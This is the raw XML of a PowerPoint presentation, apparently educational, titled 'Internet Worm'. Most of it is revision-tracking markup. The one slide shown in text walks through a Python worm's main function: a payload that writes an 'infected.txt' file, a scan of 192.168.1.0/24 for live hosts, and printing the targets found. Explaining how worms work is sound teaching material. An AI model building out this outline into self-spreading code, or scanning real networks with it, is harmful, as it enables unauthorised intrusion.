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14752-4850-486F-ADCB-9626E124A4CF}" v="168" dt="2024-07-21T14:46:40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зар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:40.467" v="136" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T13:52:10.866" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3930024240" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T13:52:06.850" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930024240" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T13:52:10.866" v="3"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930024240" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:40:09.074" v="20" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="570137477" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:39:37.636" v="6"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="570137477" sldId="257"/>
            <ac:spMk id="2" creationId="{F73EAA85-63AE-DFF9-D245-A8222A80CB5A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:39:34.964" v="5"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="570137477" sldId="257"/>
            <ac:spMk id="3" creationId="{FF7835ED-4149-720D-5AD1-C915E873150C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:40:09.074" v="20" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="570137477" sldId="257"/>
            <ac:spMk id="5" creationId="{7D51A41F-61DA-2F3E-7FE5-BF5226D96595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:39:39.886" v="8" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="570137477" sldId="257"/>
            <ac:picMk id="4" creationId="{55547150-A00F-E1EC-94CA-65B52F4AF7A1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:41:16.577" v="45" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3659353558" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:40:15.434" v="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3659353558" sldId="258"/>
            <ac:spMk id="2" creationId="{C11870B4-5DD5-E352-CFD6-78112C9E593A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:40:26.184" v="23"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3659353558" sldId="258"/>
            <ac:spMk id="3" creationId="{C6BD56B4-E70F-9936-0FF3-861826131C78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:41:02.483" v="39" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3659353558" sldId="258"/>
            <ac:spMk id="6" creationId="{F2E6C63E-EED3-4A3F-0CCB-4BBFB5DE66EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:41:16.577" v="45" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3659353558" sldId="258"/>
            <ac:spMk id="7" creationId="{A93486F0-D431-A961-85AC-84760D0EA51F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:40:27.606" v="24" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3659353558" sldId="258"/>
            <ac:picMk id="4" creationId="{A1A6D9CD-32C6-10F6-48D6-D22820BE78FB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:40:42.607" v="28" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3659353558" sldId="258"/>
            <ac:picMk id="5" creationId="{AC62C9AB-E53A-9DE8-2C25-D666ECF5682E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:42:31.976" v="57" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3092829396" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:41:49.834" v="48"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3092829396" sldId="259"/>
            <ac:spMk id="2" creationId="{D621074F-B963-2116-607D-85CEBCA270CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:41:47.521" v="47"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3092829396" sldId="259"/>
            <ac:spMk id="3" creationId="{7BC6C391-9D04-9197-C073-20ED5B33BE6D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:42:31.976" v="57" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3092829396" sldId="259"/>
            <ac:spMk id="5" creationId="{1D7E4C20-7ABA-536D-8930-FFC84102141A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:41:51.287" v="49" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3092829396" sldId="259"/>
            <ac:picMk id="4" creationId="{F26A8FA3-B9F3-91E5-CE40-A1F9AB185543}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:04.402" v="68" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3838511490" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:42:46.773" v="60"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3838511490" sldId="260"/>
            <ac:spMk id="2" creationId="{EC0B7DB4-2299-6AFC-4CE9-844269163750}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:42:43.961" v="59"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3838511490" sldId="260"/>
            <ac:spMk id="3" creationId="{0F443B4A-7CD6-FA56-A31F-AD1008D01F4A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:04.402" v="68" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3838511490" sldId="260"/>
            <ac:spMk id="5" creationId="{D9A9D213-6EC3-A5B2-48E8-952846F80AC4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:42:55.917" v="64" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3838511490" sldId="260"/>
            <ac:picMk id="4" creationId="{7A8DC831-37D6-6854-6820-3A0BB6CF5C81}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:31.235" v="78" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="935569100" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:18.762" v="71"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935569100" sldId="261"/>
            <ac:spMk id="2" creationId="{7E58F4AC-A8C5-8BD3-E190-14FC6457A84C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:16.605" v="70"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935569100" sldId="261"/>
            <ac:spMk id="3" creationId="{2CB61840-84C9-9A7D-9254-7792C4132F92}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:31.235" v="78" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935569100" sldId="261"/>
            <ac:spMk id="5" creationId="{B68BE8DE-5293-3297-BCB3-E7615F651335}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:23.297" v="74" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935569100" sldId="261"/>
            <ac:picMk id="4" creationId="{79C018D4-9518-1D2A-ABA0-E3D93134B706}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:09.206" v="90" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="238137615" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:48.940" v="81"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="238137615" sldId="262"/>
            <ac:spMk id="2" creationId="{2A3D8FF9-94BB-EB90-A2BD-AB95757C28B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:43:47.612" v="80"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="238137615" sldId="262"/>
            <ac:spMk id="3" creationId="{451B3540-BEE8-A81F-E39C-E0B2FBB275E0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:04.894" v="89" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="238137615" sldId="262"/>
            <ac:spMk id="5" creationId="{43E30BFC-8CDD-A5E9-3302-917346EC238B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:09.206" v="90" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="238137615" sldId="262"/>
            <ac:picMk id="4" creationId="{0364A1A0-AC3C-1516-5D6E-5163CA31F20A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:59.708" v="102" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3496999910" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:28.832" v="93"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3496999910" sldId="263"/>
            <ac:spMk id="2" creationId="{97CCF653-D5D8-75C3-7089-34B62CC494FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:27.598" v="92"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3496999910" sldId="263"/>
            <ac:spMk id="3" creationId="{77EB71CA-CB50-2FD7-91C9-861BCB36732A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:59.708" v="102" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3496999910" sldId="263"/>
            <ac:spMk id="5" creationId="{C0E3C313-46DC-1DA6-8BD4-20412322B03C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:44:38.660" v="97" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3496999910" sldId="263"/>
            <ac:picMk id="4" creationId="{4E8627EE-762A-C4B5-DFCE-541ADE749C09}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:38.037" v="110"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="509831021" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:19.287" v="105"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="956569205" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:16.787" v="104"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="956569205" sldId="264"/>
            <ac:spMk id="3" creationId="{ED1E0B6C-BE49-2686-26FA-406946A29260}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:16.787" v="104"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="956569205" sldId="264"/>
            <ac:picMk id="4" creationId="{54A02451-FC52-C8F8-F8DB-80C491F9AB9C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:51.835" v="117" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="956569205" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:29.256" v="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="956569205" sldId="265"/>
            <ac:spMk id="2" creationId="{2AFC479C-4B85-26D9-C27E-A57D50E27F06}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:50.663" v="116" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="956569205" sldId="265"/>
            <ac:spMk id="3" creationId="{25374CD4-251A-0EB5-2203-EE4E4CA6EB3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:45:51.835" v="117" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="956569205" sldId="265"/>
            <ac:picMk id="4" creationId="{54A02451-FC52-C8F8-F8DB-80C491F9AB9C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:40.467" v="136" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3168286488" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:09.304" v="120"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3168286488" sldId="266"/>
            <ac:spMk id="2" creationId="{B8AE30E3-EB43-C439-B93B-BCBEF758EC30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:07.913" v="119"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3168286488" sldId="266"/>
            <ac:spMk id="3" creationId="{11AD73FA-3BC6-61CA-D597-886895007617}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:31.655" v="132" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3168286488" sldId="266"/>
            <ac:spMk id="5" creationId="{DB06ED90-EE3E-563A-EFDF-7FA401EACA06}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:40.467" v="136" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3168286488" sldId="266"/>
            <ac:spMk id="6" creationId="{6BD28EC7-74E2-3075-211A-1797B1ADE20C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{D1C14752-4850-486F-ADCB-9626E124A4CF}" dt="2024-07-21T14:46:15.295" v="123" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3168286488" sldId="266"/>
            <ac:picMk id="4" creationId="{25CBB57B-ED57-8F70-60E2-0051F694BB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21.07.2024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/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1"/>
              <a:t>Worm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25CBB57B-ED57-8F70-60E2-0051F694B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479" y="132986"/>
            <a:ext cx="5886928" cy="27336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6ED90-EE3E-563A-EFDF-7FA401EACA06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2499" y="133662"/>
            <a:ext cx="6072265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1600" b="1" dirty="0"/>
              <a:t>def main():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Defines the main function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>payload()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Executes the initial payload to create the infected.txt file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>target_ips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>scan_network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>('192.168.1.0/24')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Scans the network for alive hosts in the specified IP range.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>target_ips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Checks if no targets are found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>print("No target found.")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Prints a message indicating no targets were found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Exits the function if no targets are found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>f'Targets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> found: {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>target_ips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Prints the list of found targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
